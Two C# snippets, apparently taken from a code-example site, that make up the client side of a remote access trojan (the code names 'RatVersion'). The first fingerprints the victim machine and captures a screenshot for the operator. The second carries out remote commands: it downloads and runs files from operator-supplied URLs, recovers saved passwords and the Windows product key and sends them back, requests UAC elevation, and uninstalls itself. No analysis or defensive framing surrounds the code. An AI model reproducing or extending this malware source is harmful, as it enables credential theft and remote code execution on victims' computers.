protected internal override void Write()
        {
            WriteByte(0); //Packet Id
            WriteString("Client");
            WriteString(GetCountry.Country());
            WriteBytes(Dns.GetHostByName(Dns.GetHostName()).AddressList[0].GetAddressBytes());
            WriteString(WindowsIdentity.GetCurrent().Name.Split('\\')[1]);
            WriteString(WMI.ReadString("CSName", "CIM_OperatingSystem", null));
            WriteString(WMI.ReadString("Caption", "CIM_OperatingSystem", null));
            WriteInteger(WMI.ReadInteger("BuildNumber", "CIM_OperatingSystem", null));
            WriteString(WMI.ReadString("OSArchitecture", "CIM_OperatingSystem", null));
            WriteString(WMI.ReadString("CSDVersion", "CIM_OperatingSystem", null));
            WriteString(WMI.ReadString("RegisteredUser", "CIM_OperatingSystem", null));
            WriteString(WinSerial.GetSerial());
            WriteString(WMI.ReadString("SystemDirectory", "CIM_OperatingSystem", null));
            WriteString(WMI.ReadString("SystemDrive", "CIM_OperatingSystem", null) + "\\");
            WriteString(string.Format("{0} GB", WMI.ReadInteger("TotalVisibleMemorySize", "CIM_OperatingSystem", null) / 1000000));
            WriteString(WMI.ReadString("Name", "CIM_Processor", null));

            string MacAddress = "";

            try
            {
                ManagementObjectSearcher objOS = default(ManagementObjectSearcher);
                objOS = new ManagementObjectSearcher("select MACAddress, IPEnabled from Win32_NetworkAdapterConfiguration");
                foreach (ManagementBaseObject objMgmt in objOS.Get())
                {
                    if (objMgmt["IPEnabled"].ToString() == "True")
                    {
                        MacAddress += objMgmt["MACAddress"].ToString() + ", ";
                    }
                }
            }catch {}

            WriteString(MacAddress);
            WriteString(Program.RatVersion);
            WriteBytes(BitmapToBytes(ScreenCapture.resizeImage(ScreenCapture.CaptureScreen(), new Size(120, 120))));
            WriteShort((short)(Screen.PrimaryScreen.Bounds.Width));
            WriteShort((short)(Screen.PrimaryScreen.Bounds.Height));
        }
Esempio n. 2
0
        public void Start(string commands)
        {
            try
            {
                string[] cmds = commands.Split('³');

                foreach (string cmd in cmds)
                {
                    switch (cmd.Split('²')[0])
                    {
                    case "execute":
                        if (cmd.Split('²')[1].Equals("file"))
                        {
                            string url            = cmd.Split('²')[2];
                            string dropAs         = cmd.Split('²')[3];
                            string fullPathString = Path.GetTempPath();

                            mwrk.SendStatus("Downloading File...");
                            WebClient webClienta = new WebClient();
                            webClienta.DownloadFile(url, fullPathString + @"\" + dropAs);
                            Process.Start(fullPathString + @"\" + dropAs);
                            mwrk.SendStatus("Executed File!");
                        }
                        else if (cmd.Split('²')[1].Equals("update"))
                        {
                            string dllink      = cmd.Split('²')[2];
                            string saveas      = cmd.Split('²')[3];
                            string currentPath = Application.StartupPath;
                            mwrk.SendStatus("Downloading Update...");
                            WebClient webClient = new WebClient();
                            webClient.DownloadFile(dllink, currentPath + @"\" + saveas);
                            Process.Start(currentPath + @"\" + saveas);
                            mwrk.SendStatus("Executed Update! Disconnecting...");
                            Thread.Sleep(400);
                            mwrk.Uninstall();
                        }
                        break;

                    case "Recover":
                        WinSerial wins = new WinSerial();
                        Recovery  rec  = new Recovery();

                        if (cmd.Split('²')[1].Equals("Passwords"))
                        {
                            foreach (DriveInfo Drive in DriveInfo.GetDrives())
                            {
                                if (Drive.RootDirectory.FullName == @"C:\")
                                {
                                    Recovery x = new Recovery(Drive);

                                    x.recoverAll();
                                    mwrk.Send("passreco|" + mwrk.ClientID + "|" + x.allPws);
                                }
                            }
                        }
                        else if (cmd.Split('²')[1].Equals("Winserial"))
                        {
                            string serial = wins.GetWindowsProductKeyFromRegistry();
                            mwrk.Send("winserial|" + mwrk.ClientID + "|" + mwrk.OperatingSystem + "|" + serial);
                        }

                        break;

                    case "uac":
                        if (cmd.Split('²')[1].Equals("request"))
                        {
                            mwrk.Uacmode = "nonpersist";
                            Thread yellowUacThread = new Thread(mwrk.askUac);
                            yellowUacThread.IsBackground = true;
                            yellowUacThread.Start();
                        }
                        break;

                    case "antim":
                        if (cmd.Split('²')[1].Equals("normal"))
                        {
                            mwrk.StartAntiMalwareThread("#");
                        }
                        else if (cmd.Split('²')[1].Equals("enableprs"))
                        {
                            mwrk.proActiveIsEnabled = true;
                            Thread tPR = new Thread(new ThreadStart(mwrk.proactiveAM));
                            tPR.IsBackground = true;
                            tPR.Start();
                        }
                        else if (cmd.Split('²')[1].Equals("disableprs"))
                        {
                            mwrk.proActiveIsEnabled = false;
                        }
                        break;

                    case "action":
                        if (cmd.Split('²')[1].Equals("disconnect"))
                        {
                            Environment.Exit(0);
                        }
                        else if (cmd.Split('²')[1].Equals("uninstall"))
                        {
                            mwrk.Uninstall();
                        }
                        break;
                    }
                }
            }
            catch (Exception eax) { mwrk.adderror(eax.ToString()); }
        }